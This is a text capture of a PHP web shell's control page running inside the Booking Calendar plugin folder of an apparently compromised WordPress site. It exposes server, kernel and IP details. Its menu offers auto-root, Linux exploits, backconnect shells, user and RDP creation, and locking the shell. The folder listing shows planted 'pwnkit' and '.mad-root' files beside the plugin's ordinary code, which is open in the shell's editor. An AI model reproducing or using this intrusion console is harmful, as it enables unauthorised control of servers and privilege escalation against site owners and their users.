Linux webm021.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.21 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
5.4.45
premiey
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
premiey /
www /
wp-content /
plugins /
booking /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
any
[ DIR ]
drwxr-xr-x
class
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
sync
[ DIR ]
drwxr-xr-x
timeline
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
custom_html_shortcodes.php
7.9
KB
-rw-r--r--
form_parser.php
14.11
KB
-rw-r--r--
index.php
27
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
wpbc-activation.php
92.83
KB
-rw-r--r--
wpbc-core.php
8.26
KB
-rw-r--r--
wpbc-css.php
14.62
KB
-rw-r--r--
wpbc-dates.php
33.92
KB
-rw-r--r--
wpbc-debug.php
9.77
KB
-rw-r--r--
wpbc-dev-api.php
37.31
KB
-rw-r--r--
wpbc-emails.php
27.92
KB
-rw-r--r--
wpbc-include.php
14.78
KB
-rw-r--r--
wpbc-js-vars.php
10.39
KB
-rw-r--r--
wpbc-js.php
18.11
KB
-rw-r--r--
wpbc-translation.php
61.46
KB
-rw-r--r--
wpbc.php
27.89
KB
-rw-r--r--
wpbc_functions.php
152.23
KB
-rw-r--r--
wpbc_functions_dates.php
19.38
KB
-rw-r--r--
wpbc_welcome.php
11.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wpbc-core.php
<?php /** * @version 1.0 * @package Booking Calendar * @subpackage Core Functions * @category Functions * * @author wpdevelop * @link https://wpbookingcalendar.com/ * @email info@wpbookingcalendar.com * * @modified 29.09.2015 */ if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly //////////////////////////////////////////////////////////////////////////////// // Internal plugin action hooks system //////////////////////////////////////////////////////////////////////////////// global $wpdev_bk_action, $wpdev_bk_filter; function add_bk_filter($filter_type, $filter) { global $wpdev_bk_filter; $args = array(); if ( is_array($filter) && 1 == count($filter) && is_object($filter[0]) ) // array(&$this) $args[] =& $filter[0]; else $args[] = $filter; for ( $a = 2; $a < func_num_args(); $a++ ) $args[] = func_get_arg($a); if ( is_array($wpdev_bk_filter) ) if ( isset($wpdev_bk_filter[$filter_type]) ) { if ( is_array($wpdev_bk_filter[$filter_type]) ) $wpdev_bk_filter[$filter_type][]= $args; else $wpdev_bk_filter[$filter_type]= array($args); } else $wpdev_bk_filter[$filter_type]= array($args); else $wpdev_bk_filter = array( $filter_type => array( $args ) ) ; } function remove_bk_filter($filter_type, $filter) { global $wpdev_bk_filter; if ( isset($wpdev_bk_filter[$filter_type]) ) { for ($i = 0; $i < count($wpdev_bk_filter[$filter_type]); $i++) { if ( $wpdev_bk_filter[$filter_type][$i][0] == $filter ) { $wpdev_bk_filter[$filter_type][$i] = null; return; } } } } function apply_bk_filter($filter_type) { global $wpdev_bk_filter; $args = array(); for ( $a = 1; $a < func_num_args(); $a++ ) $args[] = func_get_arg($a); if ( count($args) > 0 ) $value = $args[0]; else $value = false; if ( is_array($wpdev_bk_filter) ) if ( isset($wpdev_bk_filter[$filter_type]) ) foreach ($wpdev_bk_filter[$filter_type] as $filter) { $filter_func = array_shift($filter); $parameter = $args; $value = call_user_func_array($filter_func,$parameter ); } return $value; } function make_bk_action($action_type) { global $wpdev_bk_action; $args = array(); for ( $a = 1; $a < func_num_args(); $a++ ) $args[] = func_get_arg($a); if ( is_array($wpdev_bk_action) ) if ( isset($wpdev_bk_action[$action_type]) ) foreach ($wpdev_bk_action[$action_type] as $action) { $action_func = array_shift($action); $parameter = $action; call_user_func_array($action_func,$args ); } } function add_bk_action($action_type, $action) { global $wpdev_bk_action; $args = array(); if ( is_array($action) && 1 == count($action) && is_object($action[0]) ) // array(&$this) $args[] =& $action[0]; else $args[] = $action; for ( $a = 2; $a < func_num_args(); $a++ ) $args[] = func_get_arg($a); if ( is_array($wpdev_bk_action) ) if ( isset($wpdev_bk_action[$action_type]) ) { if ( is_array($wpdev_bk_action[$action_type]) ) $wpdev_bk_action[$action_type][]= $args; else $wpdev_bk_action[$action_type]= array($args); } else $wpdev_bk_action[$action_type]= array($args); else $wpdev_bk_action = array( $action_type => array( $args ) ) ; } function remove_bk_action($action_type, $action) { global $wpdev_bk_action; if ( isset($wpdev_bk_action[$action_type]) ) { for ($i = 0; $i < count($wpdev_bk_action[$action_type]); $i++) { if ( $wpdev_bk_action[$action_type][$i][0] == $action ) { $wpdev_bk_action[$action_type][$i] = null; return; } } } } function get_bk_option( $option, $default = false ) { $u_value = apply_bk_filter('wpdev_bk_get_option', 'no-values' , $option, $default ); if ( $u_value !== 'no-values' ) return $u_value; return get_option( $option, $default ); } function update_bk_option ( $option, $newvalue ) { $u_value = apply_bk_filter('wpdev_bk_update_option', 'no-values' , $option, $newvalue ); if ( $u_value !== 'no-values' ) return $u_value; return update_option($option, $newvalue); } function delete_bk_option ( $option ) { $u_value = apply_bk_filter('wpdev_bk_delete_option', 'no-values' , $option ); if ( $u_value !== 'no-values' ) return $u_value; return delete_option($option ); } function add_bk_option( $option, $value = '', $deprecated = '', $autoload = 'yes' ) { $u_value = apply_bk_filter('wpdev_bk_add_option', 'no-values' , $option, $value, $deprecated, $autoload ); if ( $u_value !== 'no-values' ) return $u_value; return add_option( $option, $value , $deprecated , $autoload ); } //////////////////////////////////////////////////////////////////////////////// // Booking Meta Options - 'booking_options' IN 'wp_booking' TABLE //////////////////////////////////////////////////////////////////////////////// /** * Update Booking Meta Option * * @param int $booking_id ID of the booking * @param array $option_arr Associative array for saving into booking options * Example 1: saving 'locale' => 'de_DE': [ 'locale' => 'de_DE' ], * Example 2: [ 'paid' => '100.00', 'balance' => '90.00' ] * * @return array|object|stdClass[]|null */ function wpbc_save_booking_meta_option( $booking_id, $option_arr ) { global $wpdb; $sql_prepare = $wpdb->prepare( "SELECT booking_options FROM {$wpdb->prefix}booking WHERE booking_id = %d", (int) $booking_id ); $select_result = $wpdb->get_results( $sql_prepare ); if ( ! empty( $select_result ) ) { $select_result = $select_result[0]->booking_options; if ( is_null( $select_result ) ) { // NULL -> option was not defined yet for this booking row. $exist_booking_option_arr = array(); } else { $exist_booking_option_arr = maybe_unserialize( $select_result ); } } else { return false; // No booking with such ID } // Merge exist booking option array with new data $new_booking_option_arr = array_merge( $exist_booking_option_arr, $option_arr ); $serialized_booking_option_arr = maybe_serialize( $new_booking_option_arr ); $sql_prepare_update = $wpdb->prepare( "UPDATE {$wpdb->prefix}booking SET booking_options = %s WHERE booking_id = %d" , $serialized_booking_option_arr , (int) $booking_id ); if ( false === $wpdb->query( $sql_prepare_update ) ) { // Save to DB debuge_error( 'Error saving to DB', __FILE__, __LINE__ ); return false; } return true; } /** * Get Booking Meta Option * * @param int $booking_id ID of the booking * @param false $option_name name of booking option or false (can be skipped) to return array of options * * @return array|mixed|string */ function wpbc_get_booking_meta_option( $booking_id, $option_name = false ) { global $wpdb; $sql_prepare = $wpdb->prepare( "SELECT booking_options FROM {$wpdb->prefix}booking WHERE booking_id = %d", (int) $booking_id ); $select_result = $wpdb->get_results( $sql_prepare ); $exist_booking_option_arr = array(); if ( ! empty( $select_result ) ) { $select_result = $select_result[0]->booking_options; if ( ! is_null( $select_result ) ) { // NULL -> chekc if option was not defined for this booking row. $exist_booking_option_arr = maybe_unserialize( $select_result ); if ( ( ! empty( $option_name ) ) && ( ! empty( $exist_booking_option_arr[ $option_name ] ) ) ) { return $exist_booking_option_arr[ $option_name ]; } } } return $exist_booking_option_arr; }
Close